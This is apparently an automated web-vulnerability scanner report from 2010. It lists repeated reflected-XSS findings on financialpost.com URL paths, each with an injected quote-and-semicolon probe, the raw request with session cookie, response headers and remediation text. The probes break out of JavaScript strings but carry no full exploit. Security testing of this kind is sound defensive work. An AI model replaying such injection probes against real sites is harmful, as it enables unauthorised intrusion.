P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37416
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2a5c'%3bdbe23d485fd was submitted in the REST URL parameter 1. This input was echoed as d2a5c';dbe23d485fd in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executived2a5c'%3bdbe23d485fd/hr/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:11:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43275
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c50a'%3b34e2fdea153 was submitted in the REST URL parameter 2. This input was echoed as 1c50a';34e2fdea153 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/hr1c50a'%3b34e2fdea153/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43240
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d117'%3b6a5beb61248 was submitted in the REST URL parameter 1. This input was echoed as 8d117';6a5beb61248 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive8d117'%3b6a5beb61248/smart-shift/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:11:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37612
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1806'%3b95ff51b1cd7 was submitted in the REST URL parameter 2. This input was echoed as c1806';95ff51b1cd7 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/smart-shiftc1806'%3b95ff51b1cd7/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:11:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43420
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46365'%3b0515ef5e13 was submitted in the REST URL parameter 1. This input was echoed as 46365';0515ef5e13 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive46365'%3b0515ef5e13/social+media+worth+investment/3972248/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 79029
Expires: Sun, 19 Dec 2010 03:12:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:24 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive46365';0515ef5e13/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive46365';0515ef5e13;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=76882130?">
...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbf67'%3bc8bd6c0d374 was submitted in the REST URL parameter 3. This input was echoed as dbf67';c8bd6c0d374 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/social+media+worth+investment/3972248dbf67'%3bc8bd6c0d374/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70627
Expires: Sun, 19 Dec 2010 03:12:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/social-media-worth-investment/3972248dbf67';c8bd6c0d374/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=social-media-worth-investment;kw=3972248dbf67';c8bd6c0d374;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=
...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 765b9'%3ba07db4f3a59 was submitted in the REST URL parameter 4. This input was echoed as 765b9';a07db4f3a59 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/social+media+worth+investment/3972248/765b9'%3ba07db4f3a59 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44205
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b4ce'%3b81b991a8c20 was submitted in the REST URL parameter 1. This input was echoed as 2b4ce';81b991a8c20 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive2b4ce'%3b81b991a8c20/women/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43335
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4aa96'%3bb6cfa407c54 was submitted in the REST URL parameter 2. This input was echoed as 4aa96';b6cfa407c54 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/women4aa96'%3bb6cfa407c54/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44120
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18de6'%3b4749081e3e1 was submitted in the REST URL parameter 1. This input was echoed as 18de6';4749081e3e1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images18de6'%3b4749081e3e1/favicon.ico HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55; s_cc=true; s_depth=1; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:03:12 GMT
Date: Sun, 19 Dec 2010 03:03:12 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43028
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a887a'%3b741dad57e16 was submitted in the REST URL parameter 2. This input was echoed as a887a';741dad57e16 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/a887a'%3b741dad57e16 HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55; s_cc=true; s_depth=1; s_sq=%5B%5BB%5D%5D
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:03:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:03:20 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43044
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42deb'%3bac05bd1a0a1 was submitted in the REST URL parameter 1. This input was echoed as 42deb';ac05bd1a0a1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes42deb'%3bac05bd1a0a1/header/ccn-login.html HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:57:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:57:12 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43285
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71f71'%3bf62fcd6e2bf was submitted in the REST URL parameter 2. This input was echoed as 71f71';f62fcd6e2bf in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/header71f71'%3bf62fcd6e2bf/ccn-login.html HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:57:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:57:17 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 39220
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 172af'%3b120f40364cb was submitted in the REST URL parameter 3. This input was echoed as 172af';120f40364cb in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/header/172af'%3b120f40364cb HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:57:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:57:25 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43251
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 290f4'%3b344b87b1ee4 was submitted in the REST URL parameter 1. This input was echoed as 290f4';344b87b1ee4 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes290f4'%3b344b87b1ee4/sidebar/most-popular/iframed.html HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:57:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:57:14 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43593
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 678d7'%3bfe2c818c345 was submitted in the REST URL parameter 2. This input was echoed as 678d7';fe2c818c345 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/sidebar678d7'%3bfe2c818c345/most-popular/iframed.html HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:57:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:57:19 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 39528
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61041'%3bebbe0febebf was submitted in the REST URL parameter 3. This input was echoed as 61041';ebbe0febebf in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
